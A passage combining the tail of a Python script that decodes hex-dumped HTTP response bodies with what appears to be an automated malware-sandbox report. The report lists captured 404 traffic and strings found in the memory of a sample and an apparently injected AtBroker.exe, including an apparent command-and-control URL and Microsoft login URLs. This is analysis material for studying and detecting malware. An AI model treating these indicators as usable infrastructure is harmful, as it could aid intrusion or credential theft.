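        end = body.find(b"\r\n", pos)
        if end < 0:
            break
        try:
            size = int(body[pos:end].split(b";")[0].strip(), 16)
        except ValueError:
            break
        if size == 0:               # last-chunk marker
            break
        chunk = body[end + 2:end + 2 + size]
        out += chunk
        if len(chunk) < size:       # truncated dump: keep what we have
            break
        pos = end + 2 + size + 2    # skip the CRLF that terminates the chunk
    return bytes(out)


def gunzip_partial(data, step=64):
    """Inflate a gzip stream that may be cut short, returning whatever decompresses before the cut."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+ selects gzip framing
    out = bytearray()
    for i in range(0, len(data), step):
        try:
            out += inflater.decompress(data[i:i + step])
        except zlib.error:          # corrupt or cut mid-block: stop, keep the recovered prefix
            break
    return bytes(out)


def decode_data_raw(dump, chunked=False, gzipped=False):
    """Hex dump -> bytes, undoing chunked framing and gzip encoding as the response headers indicate."""
    body = hex_dump_to_bytes(dump)
    if chunked:
        body = dechunk(body)
    if gzipped:
        body = gunzip_partial(body)
    return body


def chunked_gzip_dump(payload):
    """Constructed test input: a chunked + gzip response body rendered as a hex dump."""
    gz = gzip.compress(payload)
    body = f"{len(gz):x}\r\n".encode() + gz + b"\r\n0\r\n\r\n"
    return " ".join(f"{b:02x}" for b in body)


if __name__ == "__main__":
    apache = decode_data_raw(APACHE_404_RAW)
    print(len(apache), "bytes (Content-Length: 389)")
    print(apache.decode("windows-1252"))
    prefix = hex_dump_to_bytes(NGINX_404_RAW_PREFIX)
    print("nginx chunk declares", declared_chunk_size(prefix), "bytes; dump holds", len(dechunk(prefix)))
```

A decoded length that matches `Content-Length` (389 here) tells you the dump is the whole body; a declared chunk size larger than what the dump holds tells you it is not, and `gunzip_partial` then yields only the prefix that the available deflate bytes can produce.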
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: openresty/1.25.3.2
                    Date: Wed, 13 Nov 2024 08:28:23 GMT
                    Content-Type: text/html
                    Content-Length: 561
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.25.3.2Date: Wed, 13 Nov 2024 08:28:26 GMTContent-Type: text/htmlContent-Length: 561Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.25.3.2Date: Wed, 13 Nov 2024 08:28:28 GMTContent-Type: text/htmlContent-Length: 561Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.25.3.2Date: Wed, 13 Nov 2024 08:28:31 GMTContent-Type: text/htmlContent-Length: 561Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:51 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:54 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:56 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:59 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:11 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 08:29:19 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: close
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3527019353.000000000576F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.digitaladpro.shop
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3527019353.000000000576F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.digitaladpro.shop/m6se/
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AtBroker.exe, 00000003.00000002.3526286582.0000000005F48000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000004678000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/)
                Source: AtBroker.exe, 00000003.00000002.3526286582.0000000005F48000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000004678000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2dQ
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: AtBroker.exe, 00000003.00000003.2009029232.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281124251637.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281610030481.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281832298961.jpg
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111319395468.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111325300285.jpg
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111427368389.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111513122916.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111535192258.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111538232952.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111658373793.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111752281448.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111832440129.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121022389060.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121103162503.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121124551331.jpg
